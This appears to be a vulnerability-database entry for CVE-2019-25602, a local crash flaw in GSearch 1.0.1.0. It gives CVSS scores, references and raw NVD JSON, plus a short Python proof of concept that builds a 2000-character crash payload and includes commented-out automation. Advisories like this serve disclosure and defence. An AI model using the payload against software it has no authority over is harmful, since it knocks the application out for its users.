CVE-2019-25602

Description

GSearch 1.0.1.0 contains a denial of service vulnerability that allows local attackers to crash the application by inputting an excessively long string in the search bar. Attackers can paste a buffer of 2000 characters into the search field, click search, and select any result to trigger an application crash.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

GSearch 1.0.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pyautogui
import time

# Proof of Concept for CVE-2019-25602
# Generates a payload of 2000 characters to crash GSearch

def generate_payload():
    # Create a buffer of 2000 'A' characters
    return "A" * 2000

def trigger_crash():
    payload = generate_payload()
    print(f"[+] Generated payload length: {len(payload)}")
    
    # Instructions for manual reproduction:
    # 1. Open GSearch application.
    # 2. Focus the search input field.
    # 3. Paste the payload.
    # 4. Press Enter to search.
    # 5. Click on any result.
    # The application should crash.
    
    # Example of how automation might look:
    # time.sleep(5)
    # pyautogui.write(payload)
    # pyautogui.press('enter')
    # pyautogui.click(x=100, y=200) # Coordinates of a result

if __name__ == "__main__":
    trigger_crash()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25602
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25602
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25602/
[4] VulDB https://vuldb.com/cve/CVE-2019-25602
[5] https://www.exploit-db.com/exploits/47026
[6] https://www.microsoft.com/store/productId/9NDTMZKLC693
[7] https://www.vulncheck.com/advisories/gsearch-denial-of-service-via-search-input

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25602", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:27.710", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "GSearch 1.0.1.0 contains a denial of service vulnerability that allows local attackers to crash the application by inputting an excessively long string in the search bar. Attackers can paste a buffer of 2000 characters into the search field, click search, and select any result to trigger an application crash."}, {"lang": "es", "value": "GSearch 1.0.1.0 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al introducir una cadena excesivamente larga en la barra de búsqueda. Los atacantes pueden pegar un búfer de 2000 caracteres en el campo de búsqueda, hacer clic en buscar, y seleccionar cualquier resultado para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1260"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/47026", "source": "[email protected]"}, {"url": "https://www.microsoft.com/store/productId/9NDTMZKLC693", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/gsearch-denial-of-service-via-search-input", "source": "[email protected]"}]}}